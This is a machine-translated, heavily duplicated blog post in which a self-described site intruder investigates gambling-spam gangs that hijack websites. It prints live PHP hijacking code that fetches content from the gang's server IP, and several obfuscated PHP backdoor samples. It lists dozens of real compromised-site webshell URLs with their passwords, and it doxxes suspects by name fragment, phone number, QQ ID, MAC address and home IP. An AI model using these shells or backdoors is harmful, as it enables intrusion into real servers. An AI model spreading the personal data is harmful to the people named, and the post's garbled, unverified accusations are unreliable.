cause
The reason for this is that one day I infiltrated a big station, and when I entered webshell the next day, I found that there was a new back door in the current directory. After careful inspection, I found that it was the gambling gang who did it. The website was hijacked by the global black hat program, as follows
set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http:// 107.182.228.74/');
define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|[email protected]');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{[email protected]('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%[email protected]",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d
set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http:// 107.182.228.74/');
define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|[email protected]');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'], 'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{[email protected]('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o); $h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%[email protected]",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s, u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d
It seems to be aimed at 360. I was stunned by the results of searching for gambling related keywords on site through 360!!!! Actually, a lot of stations are hijacked, and many of them, including my penetration test stations, look like the ranking controlled by the search engine itself. In fact, illegal elements use the ranking algorithm rules of the search engine. Through the collection time, it was found that this problem began to appear in 2014, that is to say, it has existed for many years and has only been exposed so far.
Then I conducted all the questioning investigations, because the use of these things has a great impact on society, not only I am the only victim, but also all the people in this security circle.
investigation
Find the gangs behind the scenes
Chadama problem
Analyzing the back door characteristics of gangs
1. I combed the shell in my hand. First, I modified the address of the back door. I put JS code in the original address of the back door. This code records the fingerprint information and the JSON access of major websites. This is the time to wait quietly.
2. I analyzed Malaysia again, and there was no problem reading all the codes badly. At the same time, I also did packet capturing analysis for the horse, and there was no external request. Because I haven't found any problems, I purposely monitored the packets for up to a week, but there was no result. At this time, I was very puzzled. Since there is no problem with horses, why can people get all my back doors? Is it my computer being hacked? My network environment can't make any protocol request except HTTP, and my back door is saved in this Linux, which can also be excluded. I have to think about it again.
3. I checked all the stations hijacked by the team, and then found that the creation time of all the files in each station would be updated to the invasion time by them, which just conforms to the characteristics, that is, the stations just invaded by them.
As shown in the figure, almost every station will be updated at all creation times after being invaded.
After that, samples were collected from their own back door, and new progress was made. A total of 2 waves of different gangs were found, but all the Damascus used were of the same type. (see Annex 1)
After I conducted a decryption audit on their horse, I found that the box address of the back door of the horse recorded by them was api.fwqadmin.com. Because there was a new clue, they could only keep it temporarily, and then infiltrate it later.
Progress
After two days of waiting, I finally got the fingerprint information and QQ number of the gang, and then I started the big god mode for social workers, and then basically confirmed the real information of the man (called Lao yuan in the circle). Then I applied for a QQ trumpet and added some QQ on the gambling navigation website anonymously. I asked several people on QQ, but there was no result. Later, I simply communicated with them in depth in the name of gambling. Through communication, I found that the shells of the gang were all purchased, with a monthly income of several million yuan. Whether it is true is unknown. At present, I can basically confirm my judgment error. Lao yuan is the only clue.
I collected all the stations hijacked by the gang and jumped to their navigation domain. First of all, I infiltrated those stations that were not my own, collected samples from the back door, and found that there was a Damascus similar to mine, but the core variable structure was not the same, so I downloaded it back for audit packet capturing. Later, by comparing the features, I found that the post parameters requested by Damascus were the same, such as gopwd = password & godir= At this time, it is preliminarily determined that there is a problem in the upper network. It is too terrible to extract the address of Damascus features through traffic.
I got in touch with old yuan and had some cross examination communication with him. I felt that he was very afraid. He said don't engage him. He used to cheat. Later, I sent some shell addresses to please me, as shown in the following list. Here is the star team's:
http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.212200.com/mocuz/downapp/images/pclife.php?1=2&Z=Opm Hys7sa5wrKKO00GSBtashras28asNNmsn18
http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop
http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS
http://www.baby-edu.com/member/admin/include/fields/box/index.php?v=qw ytsadAskLs27ssJsjdasd2sS
http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko
http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop
http://www.hubeifc.com/phpcms/modules/content/classes/commentl_api.class.php UTF8
http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS
http://www.huse.edu.cn/phpsso_server/phpcms/languages/en-us/condif.inc.php?v=sd ytsadAskLs27ssJsjdasd2sS
http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko
http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://bbs.fish3000.com/mobcent/app/config/discuz.bak.php?1=2&TD=SAS UUys78tasdRhasd00iasdyTGGgahs
http://bbs.dqdaily.com/uc_server/install/images/close.php?1=2&sha=shan 7yJJN730%1&uqYYqwhkkasII17vcxQ1mzaPQhn8!P
http://www.aquasmart.cn/member/fckeditor/editor/css/friend.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.yangji.com/member/editor/fckeditor/editor/dtd/fck_dtd_test.gif?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko
http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg
http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg
http://bbs.taisha.org/pms/data/templates/wind_homes.tpl.php?baidu=Google erk12hj3nfher71h3j4k132bnnebr3hg4134
http://www.168w.cc/api/map/baidu/baidu.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.dibaichina.com/goldcard/data/alliance/images/GHMC.php?1=1&baidu=.com Tmbdcuu123uualltop
http://www.ijcz.cn/module/brandjoin/join.claos.php?1=2&BK=ManUtd YIasdwj78954qwtyVVJsarwhahuyrwvsllps2
http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qkos
http://www.hotpoll.com.cn/i/index.php?v=111 heiheideheihei
http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.212200.com/mocuz/downapp/images/pclife.php?1=2&Z=Opm Hys7sa5wrKKO00GSBtashras28asNNmsn18
http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop
http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS
http://www.baby-edu.com/member/admin/include/fields/box/index.php?v=qw ytsadAskLs27ssJsjdasd2sS
http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko
http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop
http://www.hubeifc.com/phpcms/modules/content/classes/commentl_api.class.php UTF8
http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS
http://www.huse.edu.cn/phpsso_server/phpcms/languages/en-us/condif.inc.php?v=sd ytsadAskLs27ssJsjdasd2sS
http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko
http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://bbs.fish3000.com/mobcent/app/config/discuz.bak.php?1=2&TD=SAS UUys78tasdRhasd00iasdyTGGgahs
http://bbs.dqdaily.com/uc_server/install/images/close.php?1=2&sha=shan 7yJJN730%1&uqYYqwhkkasII17vcxQ1mzaPQhn8!P
http://www.aquasmart.cn/member/fckeditor/editor/css/friend.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.yangji.com/member/editor/fckeditor/editor/dtd/fck_dtd_test.gif?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko
http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg
http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg
http://bbs.taisha.org/pms/data/templates/wind_homes.tpl.php?baidu=Google erk12hj3nfher71h3j4k132bnnebr3hg4134
http://www.168w.cc/api/map/baidu/baidu.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.dibaichina.com/goldcard/data/alliance/images/GHMC.php?1=1&baidu=.com Tmbdcuu123uualltop
http://www.ijcz.cn/module/brandjoin/join.claos.php?1=2&BK=ManUtd YIasdwj78954qwtyVVJsarwhahuyrwvsllps2
http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qkos
http://www.hotpoll.com.cn/i/index.php?v=111 heiheideheihei
What the hell is the StarCraft team? Is it hard to do gambling again? After further communication with old yuan, he found that these shells are all another gambling player. He said that they are the biggest group in the gambling circle. To be honest, I'm very excited. I find this matter more and more interesting. I'd like to see who these people are.
But now my goal is still "Lao yuan", because I have to find the person who sells his shell. After some competition, I get the truth, and I also ask him to provide the evidence of the transaction. I'll leave it out here. I'll put it in the forensics section later.
Although there is a shell seller's contact information, it has not been added. At this time, I took another way of thinking, fishing forensics, the old way, or JS JSON on the address of Malaysia, which pasted a few words "add me email: [email protected] I will give you all webshell" to let old Yuan send it to him, so that he can actively contact me.
Later, if he really visited several webshell addresses, I also grabbed his real PC fingerprint, proxy fingerprint and QQ nickname. After that, he took the initiative to find me, asked me if I was from the star team, and said that he had received my email. At this time, I was curious. Did the StarCraft team find him? Then he came to intimidate me and said he wanted to catch you (the StarCraft team). He has investigated the StarCraft team for a year.
At this time, my heart thought, the water is really deep. Who is looking up who is looking up who. But he can't hide it from me. After all, I have evidence that he sells shells, but unexpectedly, he said, "I'm all behind the provincial people. How do you think these shells come from? It's all extracted from the state machine. " Can the state do such a thing? I believe that the state extracts the website records, and the ISP keeps the logs for 1 year. As for the batch extraction of the national website visit features, I don't believe it, or the hacker invades the operator to extract it.
After some communication, he said that I was an interstellar team all the time, which made me black. Later, I took the initiative to add him and said, "you are from Hebei. I have evidence of your crime." He was afraid. He offered to give me advice and sent me the packed webshell. At this time, I was shocked again. This is against the rhythm of the sky. There are tens of thousands of webshell and background login passwords of all CMS in China, including dedecms discuz WordPress emlog ECSHOP empty Jieqi phpMyAdmin UCHOME UCenter PHP168, which almost all CMS in the country are stored, and the number of repetitions of each kind is tens of thousands. I will upload part of them in the attachment. He said that the person behind him has hundreds of thousands of discuz background login account passwords. I tested some of the background passwords he sent me, all of which can be logged in, including the login from hash uid user name, password, security questions and security answers, all of which were the day before.
What is it that can record so many things without any abnormality. I see that there are also many stations in Malaysia that I have used, and there are tens of thousands of webshells in them, including a large number of my stations, as well as a large number of different types of Damascus and different passwords. It seems that I am not the only victim. I match the features, which may have different features of hundreds of Damascus. And what he sent me was only a small part, asking me to give him money to give me more. In this way, he has hundreds of thousands of resources. He said that the people behind him are the technical team, and there are various 0days, which are for the country. He has the national webshell in his hand. If that's what he said, why do the resources appear here and sell them? It's obviously a lie that I'm afraid to look him up. I don't believe it. I decided to continue the investigation.
After several days of analysis, this wave of data is the same as the Jiugong grid exposed by wooyun (you can go back to http://www.dedebox.com/core/centerxxxxx.php in 2013). I also packed and analyzed the data at that time, and found that there are some duplicate data in the shell. At present, the login parameters of Damascus and Jiugongge are basically in spider PHP Shell (SPS -) is modified on the basis of this code, that is to say, in addition to the back door itself, this group also extracts a large number of webshells through other channels, and then runs the code recording background data through webshell to write dead code in memory, maintaining the state of being immortal for years as long as the server is not changed, which is also a guess, because some stations in the background data are indeed Jiugongge repeated that if it was the back door of Jiugongge, I would have a new direction to check. The above is my general analysis and investigation process. Next, I will not describe the process, but directly provide data records and evidence collection results to the police for completion.
Obtain evidence
Here are the domain names that gang one (Lao yuan) jumped to:
116305.net
559160.net
618309.net
786077.net
551809.com
www.919808.net
www.226830.com
116305.net
559160.net
618309.net
786077.net
551809.com
www.919808.net
www.226830.com
They all come from the same gang, but the domain names are different. Each station jumps to different domain names to disperse risks. The IP in the hijacking code is the same 107.182.228.74, which is very sophisticated.
These are the IP addresses that simulate spiders to grab the BC logo image addresses of hijacked content:
210.126.27.70
pic.root1111.com
58.96.179.132
104.202.66.226
210.126.27.70
pic.root1111.com
58.96.179.132
104.202.66.226
The working environment IP of this group is in Malaysia (from October 9 to October 26)
2016-10-26 13:00:01 ( IP 14.192.210.34 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864
2016-10-26 13:20:09 ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864
2016-10-26 13:00:25 ( IP 175.141.34.101 ) 马来西亚Windows NT 6.3, Chrome 50.0.2661,QQBrowser 9.5.9244, 1920×1080
2016-10-24 13:59:17 ( IP 175.136.41.251 ) 马来西亚Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864
2016-10-25 14:28:11 ( IP 175.143.101.241 ) 马来西亚 Windows NT 10.0, Chrome 47.0.2526, 1920×1080
2016-10-26 13:20:09 ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864
14.192.211.116 马来西亚
14.192.211.223 马来西亚
175.138.234.137马来西亚
2016-10-26 13:00:01 (IP 14.192.210.34) Malaysia Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536 × 864
2016-10-26 13:20:09 (IP 103.6.245.143) Malaysia Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536 × 864
2016-10-26 13:00:25 (IP 175.141.34.101) Malaysia Windows NT 6.3, chrome 50.0.2661, qqbrowser 9.5.9244, 1920 × 1080
2016-10-24 13:59:17 (IP 175.136.41.251) Malaysia Windows 7 & 2008 R2, MSIE 49.0, Firefox 49.0, 1536 × 864
2016-10-25 14:28:11 (IP 175.143.101.241) Malaysia Windows NT 10.0, chrome 47.0.2526, 1920 × 1080
2016-10-26 13:20:09 (IP 103.6.245.143) Malaysia Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536 × 864
14.192.211.116 Malaysia
14.192.211.223 Malaysia
175.138.234.137 Malaysia
Working PC fingerprint (analysis of 5 members of the gang):
Windows NT 6.3, MSIE 11.0,QQBrowser 9.5.9244, 1920×1080, 224 色
Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864
Windows NT 10.0, Chrome 47.0.2526, 1920×1080
Windows XP, MSIE 6.0, 1126×800
Windows Server 2003, Chrome 49.0.2623, 1920×1080
Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864
Windows NT 6.3, MSIE 11.0,QQBrowser 9.5.9244, 1920 x1080, 224
Windows 7 &2008 r2, MSIE 49.0,Firefox 49.0, 1536x864
Windows NT 10.0, Chrome 47.0.2526, 1920-1080
Windows XP, MSIE 6.0, 1126x800
Windows Server 2003, Chrome 49.0.2623, 1920-1080
Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536-x864
"27492;" 22242;"20249;" 39046;"
QQ 4743048XX 6410755XX
真实姓名:袁X 重庆人
手机号:159989847XX 手机MAC:18:9E:FC:11:2C:70 马来西亚手机号:0601369589XX
QQ 4743048XX 6410755XX
Real name: Yuan x Chongqing people
Mobile number: 1599847xx mobile MAC: 18:9e: FC: 11:2c:70 Malaysia mobile number: 0601369589xx
His website:
www.7cq.tv(他建立的地方论坛)
api.fwqadmin.com(这个是他自己正在使用的大马自己留的后门收信地址)附件会有大马样本有兴趣的可以看看
www.badongedu.com
Www.7cq.tv (his local forum)
Api.fwqadmin.com (this is the back door address of Malaysia he is using) the attachment will have a sample of Malaysia. If you are interested, please have a look
Email:[email protected] [email protected]
Historical IP in China:
222.178.225.146(重庆市 电信)
222.178.201.12(重庆市 电信)
27.11.4.19(重庆市 联通)
27.10.36.56(重庆市 联通)
113.204.194.202(重庆市 联通)
119.84.66.14(重庆市 电信)
61.161.125.77(重庆市巴南区 时代e行线网迷俱乐部李家沱店A/B馆)
222.178.225.146 (Chongqing Telecom)
222.178.201.12 (Chongqing Telecom)
27.11.4.19 (Chongqing Unicom)
27.10.36.56 (Chongqing Unicom)
113.204.194.202 (Chongqing Unicom)
119.84.66.14 (Chongqing Telecom)
61.161.125.77 (Hall A / B, lijiatuo store, time E-line fans club, Banan District, Chongqing)
Historical PC information in China:
mac:90-2b-34-93-ad-73
操作系统:Microsoft Windows XP
显卡:NVIDIA GeForce GT 610
CPU:AMD Athlon(tm) II X4 640 Processor 3325HZ
团伙成员信息就没去调查了,找到他就可以了。
WebShell卖家(一切安好)信息
mac:90-2b-34-93-ad-73
Operating system: Microsoft Windows XP
Video card: NVIDIA geforce GT 610
CPU:AMD Athlon(tm) II X4 640 Processor 3325HZ
We didn't investigate the gang members' information. Just find him.
Webshell seller information
VPN agent:
110.10.176.127 韩国
2016-10-24 22:26:37 ( IP 211.110.17.189 ) 韩国
110.10.176.127 Korea
2016-10-24 22:26:37 (IP 211.110.17.189) Korea
(host building purchased by bitcoin) access time: October 9
Real IP:
2016-10-26 16:23:27 ( IP 121.18.238.18 ) 河北省保定市 上海网宿科技股份有限公司联通CDN节点 Windows NT 10.0, Chrome 47.0.2526, 1920×1080
27.186.126.196 河北省保定市 电信 真实ip可能性更大
2016-10-26 16:23:27 (IP 121.18.238.18) Baoding Shanghai Wangsu Technology Co., Ltd. of Hebei Province Unicom CDN node Windows NT 10.0, chrome 47.0.2526, 1920 × 1080
27.186.126.196 Baoding Telecom is more likely to have real IP
There are three different fingerprint information in the browser, but they should all be the same person. Maybe there are more computers, because he has two QQS
Windows NT 6.3, Chrome 45.0.2454, 1366×768 真实指纹
Windows NT 10.0, Chrome 47.0.2526, 1920×1080
Windows NT 6.3, Chrome 45.0.2454, 1366×768, 224 色, 未装 Alexa 工具
Windows NT 10.0, Chrome 53.0.2785, 1600×900, 224 色,
QQ2436449670 3496357182
Telegram:@haorenge888
Windows NT 6.3, chrome 45.0.2454, 1366 × 768 real fingerprint
Windows NT 10.0, Chrome 47.0.2526, 1920×1080
Windows NT 6.3, chrome 45.0.2454, 1366 × 768, 224 colors, without Alexa tool
Windows NT 10.0, chrome 53.0.2785, 1600 × 900, 224 colors,
QQ2436449670 3496357182
Telegram:@haorenge888
This man drives the Audi A8 now. It's a local tyrant. It seems that he has made a lot of money and is still at large. It's a Hebei accent, that is, Hebei people.
If you want to find out the source of webshell, you can only check his behind the scenes channel.
His trading information with Lao yuan:.
Interstellar Gang information
Used domain name:
wokeda.cn
chuan2828.com
cnzzz.pw
web-159.com
diyi1111.com
diyi2222.com
diyi3333.com
diyi4444.com
xinyu55.com
hongyihai.com
80268.com
5130898.com
maimai789.com
zhenyi58.com
xwgy999.com
wokeda.cn
www.98589.com
www.356388.com
chuan28.com
cnzzz.pw
web-159.com
diyi1111.com
diyi2222.com
diyi33.com
diyi44.com
xinyu55.com
hongyihai.com
80268.com
5130898.com
maimai789.com
zhenyi58.com
xwgy999.com
.32479;"35745;"20195;"30721;
document.writeln("<div style=\"display:none;\"><script language=\"javascript\" type=\"text\/javascript\" src=\"http:\/\/js.users.51.la\/18737987.js\"><\/script><\/div>");
var hmt = hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "//hm.baidu.com/hm.js?c1c374db31da00a022c09301920eff78";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s)
})();
callJump()
}
}
} if (init_flag == "93989") {
call_init_error()
}
document.writeln("<div style=\"display:none;\"><script language=\"javascript\" type=\"text\/javascript\" src=\"http:\/\/js.users.51.la\/18737987.js\"><\/script><\/div>");
var hmt = hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "//hm.baidu.com/hm.js?c1c374db31da00a022c09301920eff78";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s)
})();
callJump()
}
}
} if (init_flag == "93989") {
call_init_error()
}
Through the statistical code analysis of their website, we can log in the record that the IP of Malaysia is the real IP
There are more than 1000 websites hijacked by them, including many of the largest news websites in China, such as ifeng.com china.com.cn. If the police need me, I can provide a list
The star hijacking group is in Malaysia, with about six members. The means of group penetration include but are not limited to harpoon, social workers, blasting, xday and loopholes. Reptiles will invade in batches. After each invasion, they like to leave a large number of back doors to prevent the loss of authority.
Division of labor:
Two core technology infiltrators (one of them is mainly responsible for attacking and invading large news type sites. One is mainly responsible for code audit, as well as a series of internal PHP development, including hijacking programs, and invasion of some medium-sized weight sites)
A common technology penetration (intrusion of garbage sites scanned for vulnerabilities)
Two people are responsible for hanging the hijacking code. If they stop, they will recover
A person in charge of marketing and finance, account collection and account collection on BC website
Core members returned to China from Malaysia in December 2015 to Malaysia around February 2016
The above is the information that I learned through some measures taken by the people in the circle. Because the gang has a high sense of security, they don't get much real information, but a hacker who has outsourced to them can follow suit
QQ used in interstellar: the earliest time of 31xxxxxx
Famous beauty hacker: yingcracker
QQ:2537789XX 9847545XX
Mobile: 13665xxxxxx or 13665xxxxxx
Name: Jiang XX
Find this beautiful hacker to understand the situation of the gang, and there should be progress
Their back door samples:
<?php
@$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[ziiuioxs]);
echo 'error';exit;?>
<?php
@$ksvSGu= "\x73tr\x5f\x72e\x70l\x61\x63e";
@$xRec= @$ksvSGu('wcaSq','','awcaSqrrwcaSqawcaSqywcaSq_filwcaSqter');
@$SOet= @$ksvSGu('wZTB','','aswZTBsewZTBrwZTBt');
@$xRec((array)@$_REQUEST['rretgscr'],@$SOet);
?>
<?php
if($_GET['jumpvv']){
$tu="TVFsnZG9vcnB5J";
$mzd="10pOwoK";
$fc="Cg";
$tnz = str_replace("rn","","rnstrnrrn_rrnernprnlrnarncrne");
$nu="pqldmqFsKCRfUE9";
$qwb = $tnz("u", "", "ubuausue6u4u_udueucoudue");
$lcq = $tnz("j","","jcrjejatej_jfujnjcjtjiojn");
$htx = $lcq('', $qwb($tnz("q", "", $fc.$nu.$tu.$mzd))); $htx();}
?>
<?php
@$EuTsNl="p"."r"."eg_r"."epla"."c"."e";
@$EuTsNl("/[email]/e",$_POST['iiaqffg'],"error");
?>
<?php
$ad = '|';$ad .='.';$ad .='*|';$ad .='e';
@preg_filter('|.*|e', $_REQUEST['andyzhengs'], '');
?>
<? PHP
@$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[ziiuioxs]);
echo 'error';exit;?>
<? PHP
@$ksvSGu= "\x73tr\x5f\x72e\x70l\x61\x63e";
@$xRec= @$ksvSGu('wcaSq','','awcaSqrrwcaSqawcaSqywcaSq_filwcaSqter');
@$SOet= @$ksvSGu('wZTB','','aswZTBsewZTBrwZTBt');
@$xRec((array)@$_REQUEST['rretgscr'],@$SOet);
> >
<? PHP
if($_GET['jumpvv']){
$tu="TVFsnZG9vcnB5J";
$mzd="10pOwoK";
$fc= "Cg";
$tnz = str_replace("rn","","rnstrnrrn_rrnernprnlrnarncrne");
$nu="pqldmqFsKCRfUE9";
$qwb = $tnz("u", "", "ubuausue6u4u_udueucoudue");
$lcq = $tnz("j","","jcrjejatej_jfujnjcjtjiojn");
$htx = $lcq('', $qwb($tnz("q", "", $fc.$nu.$tu.$mzd))); $htx();}
> >
<? PHP
@$EuTsNl="p"."r"."eg_r"."epla"."c"."e";
@$EuTsNl("/[email]/e",$_POST['iiaqffg'],"error");
> >
<? PHP
$ad = '|';$ad .='.';$ad .='*|';$ad .='e';
@preg_filter('|.*|e', $_REQUEST['andyzhengs'], '');
> >
Part of it I copied directly to the folder
Address suspect information
The characteristics of this incident are similar to those of Jiugong grid, so I combed the incident in 2013 and conducted an in-depth investigation on this person. It can be confirmed that two people, one of them must have done it.
If it's not Malaysia's problem, then you can also learn about the back door incident from these two people. The only uncertainty is that Malaysia of the box can't see any problems. Because it's so similar to the data of the back door before them, it almost sums up all the CMS. Some of the background records are also in the nine palace boxes that were intruded a few years ago, and new contents are still being recorded up to now
Suspect 1:
The original toast member spider, the founder of spider Malaysia, also stayed in the back door at that time, which dates back to 2011. After investigation, there was a back door in the shell Malaysia that he went out publicly at that time, and he also used a lot of games to hijack, record and hang horses. It is said that he made millions of money in 2012, and then he kept a low profile Sight, disappeared in the circle. But now there are new findings in the survey. He has been active. This year, he logged in to the historical mailbox and renewed the domain name of the back door. Because he couldn't change the domain name, he couldn't accept the shell.
Id: iamspider iamsunchao
Real name: Sun x
Age: 29 (uncertain)
Studied in: Fuxi junior high school, Rongxian, Zigong
Household registration: Xichang, Chengdu
QQ: 80937xx (real QQ) 8622629xx (small)
Historical IP (may be out of date)
222.215.38.109 (Neijiang Telecom, Sichuan Province)
61.157.123.56 (Xichang Telecom, Liangshan Prefecture, Sichuan Province)
222.215.39.131 (Neijiang City (Longchang County) Telecom, Sichuan Province)
222.209.198.201 (blue sky cloud Internet bar near Sichuan Conservatory of music, Xindu District, Chengdu, Sichuan Province)
Suspect 2:
